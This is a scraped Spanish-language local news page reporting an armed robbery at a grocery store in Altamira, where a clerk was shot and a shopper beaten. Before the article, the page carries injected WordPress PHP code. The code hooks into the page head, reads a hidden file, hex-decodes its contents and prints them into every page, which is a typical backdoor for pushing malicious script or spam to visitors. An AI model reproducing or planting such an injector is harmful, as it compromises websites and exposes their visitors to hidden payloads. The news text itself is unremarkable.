if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Violento asalto en negocio de Altamira – Reporte Noreste
Conéctate con nosotros

Sin categoría

Violento asalto en negocio de Altamira

Violento asalto en negocio de Altamira

Violento asalto se registró en el fraccionamiento Laguna Florida en Altamira, en donde dos sujetos armados dispararon contra el encargado de una tienda de abarrotes y golpearon a una mujer, sin que hasta el momento hayan sido capturados.

Los hechos ocurrieron la noche de este jueves en el negocio «Los Maya» en el mencionado sector altamirense, en donde dos sujetos armados ingresaron al sitio con la intención de robar.

Uno de los delincuentes disparó contra el encargado del lugar hiriéndolo en el pecho, para después salir corriendo, golpeando en su camino a una mujer que se disponía a realizar sus compras en dicho local.

Al lugar acudieron los paramédicos de la Cruz Roja quienes trasladaron a los lesionados a un hospital mientras que autoridades realizaban un operativo de búsqueda para dar con los dos delincuentes, sin que lograran ubicarlos.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sin categoría